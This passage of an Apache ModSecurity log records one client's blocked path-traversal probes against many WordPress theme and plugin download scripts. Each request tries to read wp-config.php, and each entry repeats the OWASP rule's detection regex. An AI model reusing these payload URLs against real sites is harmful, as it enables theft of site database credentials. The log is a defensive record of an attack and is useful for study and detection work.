%2F..%2F found within REQUEST_URI: /wp-content/themes/zeebusiness/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zeebusiness/download.php"] [unique_id "YtscfHxqqtgWgIAXsGFhnAAAAAc"] [Fri Jul 22 16:54:04.557734 2022] [:error] [pid 22472:tid 140016990738176] [client 72.11.157.116:51852] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/maronpro/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/maronpro/download.php"] [unique_id "YtscfCpbG8_UBGXeM63w7wAAAJI"] [Fri Jul 22 16:54:04.653891 2022] [:error] [pid 23081:tid 140017057879808] [client 72.11.157.116:51854] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/DolarToday/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/DolarToday/down.php"] [unique_id "YtscfHhurfgLch3PImzIPgAAAMo"] [Fri Jul 22 16:54:04.744218 2022] [:error] [pid 23081:tid 140017141806848] [client 72.11.157.116:51856] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MusicMaker/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MusicMaker/download.php"] [unique_id "YtscfHhurfgLch3PImzIPwAAAMA"] [Fri Jul 22 16:54:04.833930 2022] [:error] [pid 23081:tid 140017133414144] [client 72.11.157.116:51860] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/green_farming_new/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/green_farming_new/download.php"] [unique_id "YtscfHhurfgLch3PImzIQQAAAME"] [Fri Jul 22 16:54:04.923913 2022] [:error] [pid 23081:tid 140017049487104] [client 72.11.157.116:51862] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "YtscfHhurfgLch3PImzIQgAAAMs"] [Fri Jul 22 16:54:05.014117 2022] [:error] [pid 22472:tid 140017099843328] [client 72.11.157.116:51864] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "YtscfSpbG8_UBGXeM63w8AAAAIU"] [Fri Jul 22 16:54:05.104752 2022] [:error] [pid 22471:tid 140017108236032] [client 72.11.157.116:51866] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php"] [unique_id "YtscfeCtYZwatdwcM8Wq7AAAAEQ"] [Fri Jul 22 16:54:05.194990 2022] [:error] [pid 22470:tid 140017091450624] [client 72.11.157.116:51868] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/RedSteel/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/RedSteel/download.php"] [unique_id "YtscfXxqqtgWgIAXsGFhnQAAAAY"] [Fri Jul 22 16:54:05.285951 2022] [:error] [pid 22472:tid 140017133414144] [client 72.11.157.116:51870] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:mp3 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mp3-jplayer/download.php"] [unique_id "YtscfSpbG8_UBGXeM63w8QAAAIE"] [Fri Jul 22 16:54:05.391432 2022] [:error] [pid 22471:tid 140017074665216] [client 72.11.157.116:51872] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/SCv1/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/SCv1/download.php"] [unique_id "YtscfeCtYZwatdwcM8Wq7QAAAEg"] [Fri Jul 22 16:54:05.493859 2022] [:error] [pid 22470:tid 140017066272512] [client 72.11.157.116:51874] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adminonline/product/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adminonline/product/download.php"] [unique_id "YtscfXxqqtgWgIAXsGFhngAAAAk"] [Fri Jul 22 16:54:05.584330 2022] [:error] [pid 23081:tid 140017125021440] [client 72.11.157.116:51876] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "YtscfXhurfgLch3PImzIQwAAAMI"] [Fri Jul 22 16:54:05.673887 2022] [:error] [pid 22470:tid 140017057879808] [client 72.11.157.116:51878] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/eshop-magic/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/eshop-magic/download.php"] [unique_id "YtscfXxqqtgWgIAXsGFhnwAAAAo"] [Fri Jul 22 16:54:05.764024 2022] [:error] [pid 22470:tid 140016965560064] [client 72.11.157.116:51880] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-post.php?alg_wc_pif_download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "YtscfXxqqtgWgIAXsGFhoAAAABU"] [Fri Jul 22 16:54:05.856419 2022] [:error] [pid 23081:tid 140016973952768] [client 72.11.157.116:51882] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/u_parts/force-download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/u_parts/force-download.php"] [unique_id "YtscfXhurfgLch3PImzIRAAAANQ"] [Fri Jul 22 16:54:05.946304 2022] [:error] [pid 22470:tid 140017141806848] [client 72.11.157.116:51884] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/nishizawa_tmp/force-download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/nishizawa_tmp/force-download.php"] [unique_id "YtscfXxqqtgWgIAXsGFhoQAAAAA"] [Fri Jul 22 16:54:06.042177 2022] [:error] [pid 22470:tid 140017125021440] [client 72.11.157.116:51886] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cafesalivation/download.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cafesalivation/download.php"] [unique_id "YtscfnxqqtgWgIAXsGFhogAAAAI"] [Fri Jul 22 16:54:06.131934 2022] [:error] [pid 23081:tid 140017015916288] [client 72.11.157.116:51890] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/liberator/inc/php/download.php?download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/liberator/inc/php/download.php"] [unique_id "YtscfnhurfgLch3PImzIRQAAAM8"] [Fri Jul 22 16:54:06.234432 2022] [:error] [pid 23081:tid 140016957167360] [client 72.11.157.116:51892] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/FR0_theme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/FR0_theme/down.php"] [unique_id "YtscfnhurfgLch3PImzIRgAAANY"] [Fri Jul 22 16:54:06.332470 2022] [:error] [pid 22470:tid 140017049487104] [client 72.11.157.116:51896] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/uploads/sb-download.php?file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/sb-download.php"] [unique_id "YtscfnxqqtgWgIAXsGFhpAAAAAs"] [Fri Jul 22 16:54:06.424070 2022] [:error] [pid 22470:tid 140017041094400] [client 72.11.157.116:51898] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/clinell/include/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/clinell/include/download.php"] [unique_id "YtscfnxqqtgWgIAXsGFhpQAAAAw"] [Fri Jul 22 16:54:06.513840 2022] [:error] [pid 22471:tid 140017141806848] [client 72.11.157.116:51900] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ypo-theme/download.php"] [unique_id "YtscfuCtYZwatdwcM8Wq7gAAAEA"] [Fri Jul 22 16:54:06.622607 2022] [:error] [pid 22472:tid 140017007523584] [client 72.11.157.116:51902] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%2F..%2F..%2Fwp-config.php"] [severity 